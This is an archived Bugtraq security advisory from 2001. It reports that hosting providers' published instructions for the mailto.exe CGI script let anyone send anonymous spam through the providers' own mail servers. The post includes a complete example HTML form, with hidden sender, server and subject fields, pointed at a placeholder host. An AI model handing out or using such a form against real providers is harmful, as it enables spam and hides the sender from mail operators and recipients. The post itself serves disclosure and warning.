Bugtraq mailing list archives

SPAMMERS DELIGHT: as feeble as feeble can be

From: "http-equiv () excite com" <http-equiv () excite com>
Date: Mon, 10 Dec 2001 15:40:25 -0800 (PST)

Monday, December 10, 2001

Forget about open relays. There is an extremely simple mailto form
application called mailto.exe available on the internet. Simply create your
html form, upload the mailto.exe into your cgi bin and fire away.

The problem is, as a courtesy, many ISP's or hosting companies or providers
of other web site 'things' give their clients, in painful detail, 
instructions on how to install and use this mailto.exe application.

The BIG problem is that these instructions include the provider's settings
including their smtp server name, and full path name to their directory
containing mailto.exe and it actually works !

For example:

<FORM ACTION="HTTP://WWW.MALWARE.COM/CGI-BIN/MAILTO.EXE" METHOD="POST"> 
<INPUT TYPE="hidden" NAME="sendto" VALUE=billg () bloatedcorp com> 
<INPUT TYPE="hidden" NAME="email" VALUE="hotsuezzz () xxxxxxrated com"> 
<INPUT TYPE="hidden" NAME="server" VALUE="smtp.malware.com"> 
<INPUT TYPE="hidden" NAME="subject" VALUE="SPAM MONGER"> 
<INPUT TYPE="hidden" NAME="resulturl" VALUE=http://ww.malware.com> 

Name: <INPUT NAME="uname" SIZE=30> 
Position: <INPUT NAME="title" SIZE=30> 
Company: <INPUT NAME="company" SIZE=30> 
E-Mail: <INPUT NAME="email" SIZE=30> 
Comments:<TEXTAREA name="comments" ROWS=10 COLS=50 SIZE="10"></TEXTAREA>

Press <INPUT TYPE="submit" VALUE="Submit">
Idiot <INPUT TYPE="HALT !" VALUE="The Above Is A Example Only - The Data Is
Fake">

This can be inputted from any desktop html editor / viewer and emails can be
fired away. Because it is located on the provider's site (within their
domain), the smtp servers work and all IP addresses are theirs. In other
words, unlike a relay which can reveal the originating IP address, this
provides for none of that.

Trivial searching with our favorite engine, reveals 2 immediate, fully
functional provider's instruction including all their details, which work
exactly as described. No doubt deep searching will yield many many more.

Notes: there does not seem to be a single solution, other than to release
this and urge any and all providers, hosting services, other  to be aware
and remove or certainly not give your working server details.


---
http://www.malware.com





______________________________________________________________________________
Send a friend your Buddy Card and stay in contact always with Excite Messenger
http://messenger.excite.com

Current thread:

SPAMMERS DELIGHT: as feeble as feeble can be http-equiv () excite com (Dec 11)
- Re: SPAMMERS DELIGHT: as feeble as feeble can be Gert-Jan Hagenaars (Dec 11)